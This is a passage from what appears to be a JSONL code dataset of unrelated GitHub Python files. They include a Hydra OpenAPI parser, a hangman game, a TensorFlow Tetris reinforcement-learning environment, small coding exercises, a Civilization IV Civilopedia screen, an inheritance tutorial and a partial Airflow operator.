Any], id: str) -> None:\n self.method = method.upper()\n self.method_details = method_details\n self.id = id\n\n def parse(self) -> List[Union[HydraClassOp, List[HydraClassProp]]]:\n method_title = str\n hydra_props: List[HydraClassProp] = []\n hydra_op: HydraClassOp\n possible_status: List[Union[HydraStatus, HydraError]] = []\n expects_resource = \"\"\n returns_resource = \"\"\n for key, value in self.method_details.items():\n if key == \"parameters\":\n for parameter in value:\n param_parser = ParameterParser(parameter)\n hydra_class_prop = param_parser.parse()\n hydra_props.append(hydra_class_prop)\n elif key == \"responses\":\n for code, response in value.items():\n response_parser = ResponseParser(code, response)\n hydra_status = response_parser.parse()\n possible_status.append(hydra_status)\n if response_parser.parse_code() != 500:\n returns_resource = response_parser.parse_returns()\n\n elif key == \"operationId\":\n method_title = value\n elif key == \"requestBody\":\n request_content = value.get(\"content\")\n for _, expects in request_content.items():\n schema_parser = SchemaParser(expects.get(\"schema\"))\n hydra_classes, _ = schema_parser.parse()\n for title, _ in hydra_classes.items():\n expects_resource = title\n\n operation_processor = OperationProcessor(\n title=method_title,\n method=self.method,\n id=self.id,\n possible_status=possible_status,\n expects=expects_resource,\n returns=returns_resource,\n )\n hydra_op = operation_processor.generate()\n\n return [hydra_op, hydra_props]\n","repo_name":"HTTP-APIs/hydra-openapi-parser","sub_path":"hydra_openapi_parser/hydra_openapi_parser_v2/parsers/method_parser.py","file_name":"method_parser.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} 
+{"seq_id":"42880551647","text":"from hangman_pics import HANGMANPICS\nfrom pyfiglet import Figlet\nimport random, os\nimport subprocess\n\n\ndef print_game_intro():\n f = Figlet(font='standard')\n print()\n print(f.renderText('hanngman'))\n\n print(HANGMANPICS[6])\n\n f = Figlet(font='contessa')\n print(f.renderText('Welcome to hangman game!'))\n\ndef fill(word, c, char_indices):\n for i in char_indices:\n word[i] = c\n return word\n\n\ndef fill_letter(word, characters):\n new_word = word\n for c in characters:\n char_indices = [i for i, j in enumerate(random_word) if j == c]\n new_word = fill(new_word,c,char_indices)\n return new_word\n\ndef clear_screen():\n subprocess.call([\"printf\", \"'\\033c'\"])\n display_word = list(len(random_word)*'_')\n print_game_intro()\n print('Guess the word: {}'.format(' '.join(display_word)))\n\n\ndef main():\n print_game_intro()\n words = open('hangman_words.txt').read().splitlines()\n global random_word\n random_word = list(random.choice(words).upper())\n display_word = list(len(random_word)*'_')\n print('Guess the word: {}'.format(' '.join(display_word)))\n user_input_list = []\n error_count = 0\n while error_count <= 5:\n user_input = input('Answer: ').upper()\n if user_input in random_word and user_input not in user_input_list:\n user_input_list.append(user_input)\n display_word = fill_letter(display_word, user_input_list)\n if display_word == random_word:\n print('\\nWell Done!')\n break\n else:\n #print(HANGMANPICS[error_count])\n error_count += 1\n clear_screen()\n if error_count > 0:\n print(HANGMANPICS[error_count])\n print(' '.join(display_word))\n else:\n print('\\nYou are HANGED, the word was: {}'.format(' '.join(random_word)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"mohi7solanki/hangman-game","sub_path":"hangman_game.py","file_name":"hangman_game.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10296121591","text":"from random import randrange as rand\nimport tensorflow as tf\nimport tensorflow.experimental.numpy as tnp\nimport sys\nimport numpy as np\n\n# The configuration\ncell_size = 20\ncols = 10\nrows = 20\nmaxfps = 30\n\ncolors = [\n(0, 0, 0 ),\n(220, 0, 20 ),\n(60, 165, 50 ),\n(100, 100, 255),\n(255, 90, 0 ),\n(255, 200, 40 ),\n(160, 50, 210),\n(70, 230, 210),\n(35, 35, 35) # Helper color for background grid\n]\n\n# Define the shapes of the single parts\ntetris_shapes = [\n tf.constant([\n [1, 1, 1],\n [0, 1, 0]]\n ),\n tf.constant([\n [0, 1, 1],\n [1, 1, 0]\n ]),\n tf.constant([\n [1, 1, 0],\n [0, 1, 1]\n ]),\n tf.constant([\n [1, 0, 0],\n [1, 1, 1]\n ]),\n tf.constant([\n [0, 0, 1],\n [1, 1, 1]\n ]),\n tf.constant([\n [1, 1, 1, 1]\n ]),\n tf.constant([\n [1, 1],\n [1, 1]\n ])\n]\n\nCOLLISION_MOVES = ['LEFT', 'RIGHT', 'ROTATE_LEFT', 'ROTATE_RIGHT'] #These moves give penalties if used in invalid ways\n\n'''\ndef check_collision(board, piece, offset):\n off_x, off_y = offset\n for i, j in np.ndindex(*piece.shape):\n cell = piece[i, j]\n try:\n if cell and board[ i + off_y ][ j + off_x ]:\n return True\n except IndexError:\n return True\n return False\n'''\n\n@tf.function\ndef check_collision(board, piece, offset):\n if piece.shape[0] + offset[0] >= board.shape[0]: return True\n if piece.shape[1] + offset[1] >= board.shape[1]: return True\n\n padded_piece = padToShape(piece, board.shape, offset)\n collided_tiles = tf.math.multiply(board, padded_piece)\n collision = tf.math.reduce_sum(collided_tiles)\n return 
collision > 0\n\n@tf.function\ndef remove_rows(board, row_mask):\n removed_count = board.shape[0] - tf.math.reduce_sum(row_mask)\n out = tf.range(row_mask.shape[0])\n out = tf.boolean_mask(out, row_mask)\n out = tf.gather(board, out)\n new_rows = tf.zeros((removed_count, board.shape[1]), dtype=tf.int32)\n out = tf.concat((new_rows, out), axis=0)\n return out\n\n# def join_matrices(mat1, mat2, mat2_off):\n# out = np.copy(mat1)\n# off_x, off_y = mat2_off\n# out[off_y: off_y + mat2.shape[0], off_x: off_x + mat2.shape[1]] += mat2\n# return out\n\n@tf.function\ndef join_matrices(mat1, mat2, mat2_off):\n mask = padToShape(mat2, mat1.shape, mat2_off)\n return tf.math.add(mat1, mask)\n\n# def padToShape(arr, shape):\n# result = tf.zeros(shape, dtype=tf.int32)\n# result[:arr.shape[0], :arr.shape[1]] = arr\n# return result\n\n#Pads array {arr} to be of size {shape}, with the orignal array anchored at {offset = (row, col)}\n@tf.function\ndef padToShape(arr, shape, offset=(0,0)):\n p_top = offset[0]\n p_bottom = shape[0] - arr.shape[0] - p_top\n p_left = offset[1]\n p_right = shape[1] - arr.shape[1] - p_left\n paddings = tf.constant([[p_top, p_bottom,], [p_left, p_right]])\n padded = tf.pad(arr, paddings)\n return padded\n\n@tf.function\ndef rotate_tensor(tensor, direction=1):\n out = tf.expand_dims(tensor, -1)\n out = tf.image.rot90(out, k=direction*-1)\n out = tf.squeeze(out, axis=-1)\n return out\n\nclass TetrisApp(object):\n def __init__(self, ai=False, rewards=None):\n self.ai = ai\n self.rewards = rewards\n self.next_stone_idx = rand(len(tetris_shapes))\n self.next_stone = tetris_shapes[self.next_stone_idx]\n self.col_heights = tf.zeros(cols, dtype=np.int32)\n self.curr_piece_rotation_cnt = 0\n \n if ai:\n if not rewards: \n raise ValueError(\"Required parameter: rewards\")\n self.invalidMoveReward, self.gameOverReward, self.validMoveReward, self.lineHeightPenalty, self.rotationPenalty = rewards\n self.initRL()\n else:\n self.initPygame()\n self.initHuman()\n \n def initPygame(self):\n import pygame\n pygame.init()\n pygame.key.set_repeat(250,25)\n self.width = cell_size*(cols+6)\n self.height = cell_size*rows\n self.rlim = cell_size*cols\n self.bground_grid = np.indices((rows, cols)).sum(axis=0) % 2\n self.bground_grid *= 8\n \n self.default_font = pygame.font.Font(\n pygame.font.get_default_font(), 12)\n \n self.screen = pygame.display.set_mode((self.width, self.height))\n pygame.event.set_blocked(pygame.MOUSEMOTION) # We do not need\n # mouse movement\n # events, so we\n # block them.\n \n @tf.function\n def new_board(self):\n board = tf.zeros((rows, cols), dtype=tf.int32)\n board = tf.concat((board, tf.ones((1,cols), dtype=tf.int32)), axis=0)\n return board\n\n def new_stone(self):\n self.stone = tf.identity(self.next_stone)\n self.next_stone_idx = rand(len(tetris_shapes))\n self.next_stone = tetris_shapes[self.next_stone_idx]\n self.stone_x = int(cols / 2 - len(self.stone[0])/2)\n self.stone_y = 0\n \n if check_collision(self.board,\n self.stone,\n (self.stone_y, self.stone_x)):\n self.gameover = True\n \n def initHuman(self):\n self.board = self.new_board()\n self.new_stone()\n self.level = 1\n self.score = 0\n self.lines = 0\n self.line_height = 0\n pygame.time.set_timer(pygame.USEREVENT+1, 1000)\n \n def initRL(self):\n '''X: [board, next, curr, pos] | A: [LEFT, RIGHT, DOWN, UP, SPACE] | S: [score]'''\n \n self.next_stone_idx = rand(len(tetris_shapes))\n self.next_stone = tetris_shapes[self.next_stone_idx]\n \n self.board = self.new_board()\n self.new_stone()\n self.level = 1\n 
self.score = 0\n self.lines = 0\n self.line_height = 0\n self.gameover = False\n self.paused = False\n \n def disp_msg(self, msg, topleft):\n x,y = topleft\n for line in msg.splitlines():\n self.screen.blit(\n self.default_font.render(\n line,\n False,\n (255,255,255),\n (0,0,0)),\n (x,y))\n y+=14\n \n def center_msg(self, msg):\n for i, line in enumerate(msg.splitlines()):\n msg_image = self.default_font.render(line, False,\n (255,255,255), (0,0,0))\n \n msgim_center_x, msgim_center_y = msg_image.get_size()\n msgim_center_x //= 2\n msgim_center_y //= 2\n \n self.screen.blit(msg_image, (\n self.width // 2-msgim_center_x,\n self.height // 2-msgim_center_y+i*22))\n \n def draw_matrix(self, matrix, offset):\n off_x, off_y = offset\n for iy, ix in np.ndindex(matrix.shape):\n val = matrix[iy, ix]\n if val:\n pygame.draw.rect(\n self.screen,\n colors[val],\n pygame.Rect(\n (off_x+ix) * cell_size,\n (off_y+iy) * cell_size, \n cell_size,\n cell_size),0)\n \n def add_cl_lines(self, n): #Returns score gained\n linescores = [0, 40, 100, 300, 1200]\n self.lines += n\n self.score += linescores[n] * self.level\n if self.lines >= self.level*6:\n self.level += 1\n if not self.ai:\n newdelay = 1000-50*(self.level-1)\n newdelay = 100 if newdelay < 100 else newdelay\n pygame.time.set_timer(pygame.USEREVENT+1, newdelay)\n return linescores[n] * self.level\n \n def move(self, delta_x):\n if not self.gameover and not self.paused:\n new_x = self.stone_x + delta_x\n if new_x < 0:\n return (False, 0)\n new_x = 0\n if new_x > cols - len(self.stone[0]):\n return (False, 0)\n new_x = cols - len(self.stone[0])\n collided = check_collision(\n self.board,\n self.stone,\n (self.stone_y, new_x))\n if not collided:\n self.stone_x = new_x\n return (True, 0)\n return (False, 0)\n\n def quit(self):\n self.center_msg(\"Exiting...\")\n pygame.display.update()\n sys.exit()\n\n #Clears all full rows and returns the score gained\n def clear_rows(self):\n cleared_rows = 0\n row_clear_mask = tf.Variable(tf.ones(21,), trainable=False)\n for i in range(self.board.shape[0]-1):\n row = self.board[i]\n if tf.math.count_nonzero(row) == row.shape[0]:\n row_clear_mask[i].assign(0)\n cleared_rows += 1\n self.line_height -= 1\n self.board = remove_rows(self.board, row_clear_mask)\n return self.add_cl_lines(cleared_rows)\n\n def drop(self, manual):\n scoreChange = 0\n if not self.gameover and not self.paused:\n scoreChange = 1 if manual else 0\n self.score += 1 if manual else 0\n prev_y = self.stone_y\n self.stone_y += 1\n if check_collision(self.board,\n self.stone,\n (self.stone_y, self.stone_x)):\n self.board = join_matrices(\n self.board,\n self.stone,\n (prev_y, self.stone_x))\n self.curr_piece_rotation_cnt = 0\n self.line_height = max(self.line_height, rows - (prev_y))\n scoreChange += self.clear_rows()\n self.new_stone()\n return (True, scoreChange)\n return (False, scoreChange)\n \n #pos = (y, x)\n # Returns the distance from the bottom of the piece to the rest of the stack\n def distance_to_stack(self, piece, pos):\n minDist = rows\n for i, j in np.ndindex(*piece.shape):\n if piece[i, j] != 0:\n glob_i, glob_j = i + pos[0], j + pos[1]\n minDist = min(minDist, rows - self.col_heights[glob_j] - glob_i)\n return minDist \n\n def insta_drop(self):\n scoreChange = 0\n if not self.gameover and not self.paused:\n dropped = self.drop(True)\n while(not dropped[0]):\n scoreChange += dropped[1]\n dropped = self.drop(True)\n scoreChange += dropped[1]\n return (True, scoreChange)\n\n def rotate_stone(self, direction = 1):\n if not self.gameover 
and not self.paused:\n new_stone = rotate_tensor(self.stone, direction)\n if not check_collision(self.board,\n new_stone,\n (self.stone_y, self.stone_x)):\n self.stone = new_stone\n self.curr_piece_rotation_cnt += 1\n\n #Penalize poor finesse by moving block down by 1 row\n if self.curr_piece_rotation_cnt >= 3:\n bonus = self.drop(False)[1]\n #But be sure to give a reward for any cleared lines etc.\n return (True, bonus)\n return (True, 0)\n return (False, 0)\n \n def toggle_pause(self):\n self.paused = not self.paused\n \n def start_game(self):\n if self.gameover:\n if self.ai:\n self.initRL()\n else:\n self.initHuman()\n self.gameover = False\n \n def run(self):\n key_actions = {\n 'ESCAPE': self.quit,\n 'LEFT': lambda:self.move(-1),\n 'RIGHT': lambda:self.move(+1),\n 'DOWN': lambda:self.drop(True),\n 'UP': self.rotate_stone,\n 'p': self.toggle_pause,\n 'SPACE': self.start_game,\n 'RETURN': self.insta_drop\n }\n \n self.gameover = False\n self.paused = False\n \n dont_burn_my_cpu = pygame.time.Clock()\n while 1:\n self.screen.fill((0,0,0))\n if self.gameover:\n self.center_msg(\"\"\"Game Over! Press space to continue\"\"\")\n else:\n if self.paused:\n self.center_msg(\"Paused\")\n else:\n pygame.draw.line(self.screen,\n (255,255,255),\n (self.rlim+1, 0),\n (self.rlim+1, self.height-1))\n self.disp_msg(\"Next:\", (\n self.rlim+cell_size,\n 2))\n self.disp_msg(\"Score: %d\\n\\nLevel: %d\\\n\\nLines: %d\" % (self.score, self.level, self.lines),\n (self.rlim+cell_size, cell_size*5))\n self.draw_matrix(self.bground_grid, (0,0))\n self.draw_matrix(self.board, (0,0))\n self.draw_matrix(self.stone,\n (self.stone_x, self.stone_y))\n self.draw_matrix(self.next_stone,\n (cols+1,2))\n pygame.display.update()\n \n for event in pygame.event.get():\n if event.type == pygame.USEREVENT+1:\n self.drop(False)\n elif event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYDOWN:\n for key in key_actions:\n if event.key == eval(\"pygame.K_\"\n +key):\n key_actions[key]()\n \n dont_burn_my_cpu.tick(maxfps)\n\n def getState(self):\n board = join_matrices(self.board, self.stone, (self.stone_y, self.stone_x))\n next_piece = padToShape(self.next_stone, (4,4)) #2x2, 2x3, 1x4\n current_piece = padToShape(self.stone, (4,4)) #2x2, 2x3, 1x4 padded to 4x4\n position = tf.constant((self.stone_x, self.stone_y), dtype=tf.int32, shape=(1, 2)) #1x2 #2x1\n line_height = tf.constant(self.line_height, dtype=tf.int32, shape=(1, 1))\n\n return([board, next_piece, current_piece, position, line_height])\n \n def getReward(self, actionStr, result, delta_line_height):\n reward = 0 \n\n if actionStr in COLLISION_MOVES:\n reward += self.validMoveReward if result[0] else self.invalidMoveReward\n \n reward += result[1]\n\n reward -= self.lineHeightPenalty * delta_line_height\n reward -= self.rotationPenalty * max(0, (self.curr_piece_rotation_cnt - 3))\n return reward\n \n def doAction(self, action):\n ACTIONS = {0: 'LEFT', 1:'RIGHT', 2:'DOWN', 3:'ROTATE_LEFT', 4:'ROTATE_RIGHT', 5:'HARD_DROP'}\n actionStr = ACTIONS[action]\n ACTION_FN = {\n 'LEFT': lambda: self.move(-1),\n 'RIGHT': lambda: self.move(+1),\n 'DOWN': lambda: self.drop(True),\n 'ROTATE_LEFT': self.rotate_stone,\n 'ROTATE_RIGHT': lambda: self.rotate_stone(-1),\n 'HARD_DROP': self.insta_drop\n }\n \n prev_line_height = self.line_height\n #Perform action\n result = ACTION_FN[actionStr]()\n\n #Return reward for action\n if self.gameover:\n reward = self.gameOverReward\n else:\n reward = self.getReward(actionStr, result, self.line_height - prev_line_height)\n \n 
return (self.getState(), reward, self.gameover)","repo_name":"bbenip/tetris-ai","sub_path":"model/rl/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":15721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40308295633","text":"def Xpattern(i):\n for j in range(1,n):\n if i==j:\n print(j,end='')\n else:\n print(' ',end='')\n for j in range(n,0,-1):\n if i==j:\n print(j,end='')\n else:\n print(' ',end='')\n print()\nn=int(input())\nfor i in range(1,n+1):\n Xpattern(i)\nfor i in range(n-1,0,-1):\n Xpattern(i)\n'''\n5\n1 1\n 2 2 \n 3 3 \n 4 4 \n 5 \n 4 4 \n 3 3 \n 2 2 \n1 1\n'''\n","repo_name":"hemanthsoma/Coding-Practice","sub_path":"Xpattern.py","file_name":"Xpattern.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"70069332323","text":"import pytest\nfrom arrays.spiral_matrix import Solution\n\n\n@pytest.mark.parametrize(\"matrix,expected\", [\n ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [1, 2, 3, 6, 9, 8, 7, 4, 5]),\n ([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]], [1, 2, 3, 4, 8, 12, 11, 10, 9, 5, 6, 7])\n])\ndef test_spiral_matrix(matrix, expected):\n assert expected == Solution().spiralOrder(matrix)\n","repo_name":"sikakente/blind-75","sub_path":"tests/arrays/test_spiral_matrix.py","file_name":"test_spiral_matrix.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4076758326","text":"from CvPythonExtensions import *\nimport CvUtil\nimport ScreenInput\nimport CvScreenEnums\n\n# globals\ngc = CyGlobalContext()\nArtFileMgr = CyArtFileMgr()\nlocalText = CyTranslator()\n\nclass CvPediaUnitChart:\n\t\"Civilopedia Screen for Unit Combat Groups\"\n\n\tdef __init__(self, main):\n\t\tself.iGroup = -1\n\t\tself.top = main\n\t\t\t\n\t\tself.X_UNITS = 50\n\t\tself.Y_UNITS = 95\n\t\tself.W_UNITS = 700\n\t\tself.H_UNITS = 570\n\t\tself.DX_UNITS = 150\n\t\tself.DY_UNITS = 40\n\t\tself.Y_TEXT_MARGIN = 6\n\n\t# Screen construction function\n\tdef interfaceScreen(self, iGroup):\t\n\t\t\t\n\t\tself.iGroup = iGroup\n\t\n\t\tself.top.deleteAllWidgets()\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\tscreen = self.top.getScreen()\n\t\t\n\t\tbNotActive = (not screen.isActive())\n\t\tif bNotActive:\n\t\t\tself.top.setPediaCommonWidgets()\n\n\t\t# Header...\n\t\tif (self.iGroup >= gc.getNumUnitCombatInfos()):\n\t\t\tszHeader = localText.getText(\"TXT_KEY_PEDIA_ALL_UNITS\", ())\n\t\telse:\n\t\t\tszHeader = gc.getUnitCombatInfo(self.iGroup).getDescription()\n\t\tszHeader = u\"\" + szHeader.upper() + u\"\"\n\t\tszHeaderId = self.top.getNextWidgetName()\n\t\tscreen.setLabel(szHeaderId, \"Background\", szHeader, CvUtil.FONT_CENTER_JUSTIFY, self.top.X_SCREEN, self.top.Y_TITLE, 0, FontTypes.TITLE_FONT, WidgetTypes.WIDGET_GENERAL, -1, -1)\n\t\t\n\t\t# Top\n\t\tscreen.setText(self.top.getNextWidgetName(), \"Background\", self.top.MENU_TEXT, CvUtil.FONT_LEFT_JUSTIFY, self.top.X_MENU, self.top.Y_MENU, 0, FontTypes.TITLE_FONT, WidgetTypes.WIDGET_PEDIA_MAIN, CivilopediaPageTypes.CIVILOPEDIA_PAGE_UNIT_GROUP, -1)\n\n\t\tif self.top.iLastScreen\t!= CvScreenEnums.PEDIA_UNIT_CHART or bNotActive:\t\t\n\t\t\tself.placeLinks(true)\n\t\t\tself.top.iLastScreen = CvScreenEnums.PEDIA_UNIT_CHART\n\t\telse:\n\t\t\tself.placeLinks(false)\n\t\t\t\t\n\t\tself.placeUnitTable()\n\t\t\t\t\t\t\n\tdef placeUnitTable(self):\n\t\tscreen = self.top.getScreen()\n\t\t\n\t\tpanelName = 
self.top.getNextWidgetName()\n\t\tscreen.addPanel( panelName, \"\", \"\", true, true,\n\t\t\tself.X_UNITS, self.Y_UNITS, self.W_UNITS, self.H_UNITS, PanelStyles.PANEL_STYLE_BLUE50 )\n\t\t\n\t\tiMargin = 40\n\t\tpanelName2 = self.top.getNextWidgetName()\n\t\tscreen.addPanel( panelName2, \"\", \"\", true, true,\n self.X_UNITS + iMargin, self.Y_UNITS + iMargin, self.W_UNITS - (iMargin * 2), self.H_UNITS - (iMargin * 2), PanelStyles.PANEL_STYLE_BLUE50 )\n\t\tszTable = self.top.getNextWidgetName()\n\t\tscreen.addTableControlGFC(szTable, 4,\n\t\t\tself.X_UNITS + iMargin, self.Y_UNITS + iMargin + 5, self.W_UNITS - (iMargin * 2), self.H_UNITS - (iMargin * 2) - 10, True, False, 32,32, TableStyles.TABLE_STYLE_EMPTY)\n\t\tscreen.enableSort(szTable)\n\t\t\t\n#\t\tscreen.attachTableControlGFC( panelName, szTable, 4, False, True, 32, 32, TableStyles.TABLE_STYLE_EMPTY );\n\t\t\t\n\t\tiTableWidth = self.W_UNITS - (iMargin * 2)\n\t\tiColWidth = int(iTableWidth * (7 / 19.0))\n\t\tscreen.setTableColumnHeader(szTable, 0, \"\", iColWidth)\n\t\tiColWidth = int(iTableWidth * (4 / 19.0))\n\t\tscreen.setTableColumnHeader(szTable, 1, u\"%c\" % CyGame().getSymbolID(FontSymbols.STRENGTH_CHAR), iColWidth)\n\t\tscreen.setTableColumnHeader(szTable, 2, u\"%c\" % CyGame().getSymbolID(FontSymbols.MOVES_CHAR), iColWidth)\n\t\tscreen.setTableColumnHeader(szTable, 3, u\"%c\" % gc.getYieldInfo(YieldTypes.YIELD_PRODUCTION).getChar(), iColWidth)\n\t\t\t\t\t\n\t\t# count units in this group\n\t\tnUnits = 0\n\t\tfor j in range(gc.getNumUnitInfos()):\n\t\t\tif (self.iGroup == gc.getUnitInfo(j).getUnitCombatType() or self.iGroup == gc.getNumUnitCombatInfos()):\n\t\t\t\tnUnits += 1\n\n\t\tdy = self.DY_UNITS\n\t\tyTextMargin = self.Y_TEXT_MARGIN\n\t\tif (self.iGroup == gc.getNumUnitCombatInfos()):\n\t\t\tdy = self.DY_UNITS/2\n\t\t\tyTextMargin = 0\n\n\t\t# sort Units by strength\n\t\ti = 0\n\t\tunitsList=[(0,0,0,0,0)]*nUnits\n\t\tfor j in range(gc.getNumUnitInfos()):\n\t\t\tif (self.iGroup == gc.getUnitInfo(j).getUnitCombatType() or self.iGroup == gc.getNumUnitCombatInfos()):\n\t\t\t\n\t\t\t\tif (gc.getUnitInfo(j).getDomainType() == DomainTypes.DOMAIN_AIR):\n\t\t\t\t\tiStrength = unicode(gc.getUnitInfo(j).getAirCombat())\n\t\t\t\t\tiMovement = unicode(gc.getUnitInfo(j).getAirRange())\n\t\t\t\telse:\n\t\t\t\t\tiStrength = unicode(gc.getUnitInfo(j).getCombat())\n\t\t\t\t\tiMovement = unicode(gc.getUnitInfo(j).getMoves())\n\t\t\t\t\t\n\t\t\t\tif (gc.getUnitInfo(j).getProductionCost() < 0):\n\t\t\t\t\tszCost = localText.getText(\"TXT_KEY_NON_APPLICABLE\", ())\n\t\t\t\telse:\n\t\t\t\t\tszCost = unicode(gc.getUnitInfo(j).getProductionCost())# + u\"%c\" % gc.getYieldInfo(YieldTypes.YIELD_PRODUCTION).getChar()\n\t\t\t\t\t\n\t\t\t\tunitsList[i] = (iStrength, iMovement, szCost, gc.getUnitInfo(j).getDescription(), j)\n\t\t\t\ti += 1\n\n\t\tfor i in range(nUnits):\t\t\t\n\t\t\tiRow = screen.appendTableRow(szTable)\n\t\t\tscreen.setTableText(szTable, 0, iRow, u\"\" + unitsList[i][3] + u\"\", \"\", WidgetTypes.WIDGET_PEDIA_JUMP_TO_UNIT, unitsList[i][4], 1, CvUtil.FONT_LEFT_JUSTIFY)\t\t\t\t\t\t\n\t\t\tscreen.setTableInt(szTable, 1, iRow, u\"\" + unicode(unitsList[i][0]) + u\"\", \"\", WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)\n\t\t\tscreen.setTableInt(szTable, 2, iRow, u\"\" + unicode(unitsList[i][1]) + u\"\", \"\", WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)\n\t\t\tscreen.setTableInt(szTable, 3, iRow, u\"\" + unicode(unitsList[i][2]) + u\"\", \"\", WidgetTypes.WIDGET_GENERAL, -1, -1, 
CvUtil.FONT_LEFT_JUSTIFY)\n\n\tdef placeLinks(self, bRedraw):\n\n\t\tscreen = self.top.getScreen()\n\n\t\tif bRedraw:\n\t\t\tscreen.clearListBoxGFC(self.top.LIST_ID)\n\t\t\n\t\t# sort groups alphabetically\n\t\tlistSorted=[(0 ,0)] * gc.getNumUnitCombatInfos()\n\t\tfor j in range(gc.getNumUnitCombatInfos()):\n\t\t\tlistSorted[j] = (gc.getUnitCombatInfo(j).getDescription(), j)\n\t\tlistSorted.sort()\t\t\t\n\n\t\tiSelected = 0\n\t\tif bRedraw:\t\t\n\t\t\tscreen.appendListBoxString( self.top.LIST_ID, localText.getText(\"TXT_KEY_PEDIA_ALL_GROUPS\", ()), WidgetTypes.WIDGET_PEDIA_JUMP_TO_UNIT_COMBAT, gc.getNumUnitCombatInfos(), 0, CvUtil.FONT_LEFT_JUSTIFY )\n\t\tif self.iGroup == gc.getNumUnitCombatInfos():\n\t\t\tiSelected = 0\n\n\t\ti = 1\n\t\tfor iI in range(gc.getNumUnitCombatInfos()):\n\t\t\tif (not gc.getUnitCombatInfo(listSorted[iI][1]).isGraphicalOnly()):\n\t\t\t\tif bRedraw:\n\t\t\t\t\tscreen.appendListBoxString( self.top.LIST_ID, listSorted[iI][0], WidgetTypes.WIDGET_PEDIA_JUMP_TO_UNIT_COMBAT, listSorted[iI][1], 0, CvUtil.FONT_LEFT_JUSTIFY )\n\t\t\t\tif listSorted[iI][1] == self.iGroup:\n\t\t\t\t\tiSelected = i\n\t\t\t\ti += 1\t\t\t\n\n\t\tscreen.setSelectedListBoxStringGFC(self.top.LIST_ID, iSelected)\n\t\t\n\t# Will handle the input for this screen...\n\tdef handleInput (self, inputClass):\n\t\treturn 0\n\n","repo_name":"max-zanko/civ4-beyond-the-sword-sdk","sub_path":"Assets/Python/Screens/CvPediaUnitChart.py","file_name":"CvPediaUnitChart.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"30436988309","text":"class Employee:\n def __init__(self, name, role, age, salary):\n self.name = name\n self.age = age\n self.role= role\n self.salary = salary\n\n @staticmethod\n def printStr():\n print('Employee') \n\n\nclass Entreprenuer:\n def __init__(self, name, age, networth, company):\n self.name = name\n self.age = age\n self.networth= networth\n self.company = company\n\n @staticmethod\n def printStr():\n print('Entreprenuer') \n\nclass Programmer(Employee, Entreprenuer):# here the order is important: the constructor for arrguments will be searched in the Employee class\n def __init__(self, name, role, age, salary, language):\n super().__init__(name, role, age, salary)\n self.language = language\n\nsam = Programmer('Sambhav Kaushik', 'brogrammer', 17, 99999999999, ['java','js','python','c++','dart']);\nprint(sam.language)\nsam.printStr()# first class will be choosen first, then second class\n","repo_name":"masterboy376/Python-tutorial","sub_path":"tut61_MultipleInheritance.py","file_name":"tut61_MultipleInheritance.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37820381817","text":"from concurrent.futures import ThreadPoolExecutor\nfrom typing import Any, Protocol, List, Optional\nfrom uuid import uuid4\nfrom airflow.models import BaseOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\nfrom pymongo import MongoClient\n\nfrom dags.dags_utils import pull_dag_upstream, push_dag_downstream, get_dag_param, smart_xcom_pull, \\\n smart_xcom_push\nfrom dags.pipelines.pipeline_protocols import NoticePipelineCallable\nfrom ted_sws import config\nfrom ted_sws.core.service.batch_processing import chunks\nfrom ted_sws.data_manager.adapters.notice_repository import NoticeRepository\nfrom ted_sws.event_manager.model.event_message import EventMessage, 
NoticeEventMessage\nfrom ted_sws.event_manager.services.log import log_notice_error\nfrom ted_sws.event_manager.services.logger_from_context import get_logger, handle_event_message_metadata_dag_context\n\nNOTICE_IDS_KEY = \"notice_ids\"\nSTART_WITH_STEP_NAME_KEY = \"start_with_step_name\"\nEXECUTE_ONLY_ONE_STEP_KEY = \"execute_only_one_step\"\nNOTICE_PROCESSING_PIPELINE_DAG_NAME = \"notice_processing_pipeline\"\nDEFAULT_START_WITH_TASK_ID = \"notice_normalisation_pipeline\"\nDEFAULT_PIPELINE_NAME_FOR_LOGS = \"unknown_pipeline_name\"\nAIRFLOW_NUMBER_OF_WORKERS = config.AIRFLOW_NUMBER_OF_WORKERS\nMAX_BATCH_SIZE = 2000\n\n\nclass BatchPipelineCallable(Protocol):\n\n def __call__(self, notice_ids: List[str], mongodb_client: MongoClient) -> List[str]:\n \"\"\"\n :param notice_ids:\n :param mongodb_client:\n :return: List of notice_ids what was processed.\n \"\"\"\n\n\nclass NoticeBatchPipelineOperator(BaseOperator):\n \"\"\"\n\n \"\"\"\n\n ui_color = '#e7cff6'\n ui_fgcolor = '#000000'\n\n def __init__(self, *args,\n notice_pipeline_callable: NoticePipelineCallable = None,\n batch_pipeline_callable: BatchPipelineCallable = None,\n **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.notice_pipeline_callable = notice_pipeline_callable\n self.batch_pipeline_callable = batch_pipeline_callable\n\n def single_notice_processor(self, notice_id: str, notice_repository: NoticeRepository,\n pipeline_name: str) -> Optional[str]:\n \"\"\"\n This method can execute the notice_pipeline_callable for a single notice_id.\n :param notice_id: The notice_id what will be processed.\n :param notice_repository: The notice repository.\n :param pipeline_name: The pipeline name for logs.\n \"\"\"\n logger = get_logger()\n notice = None\n 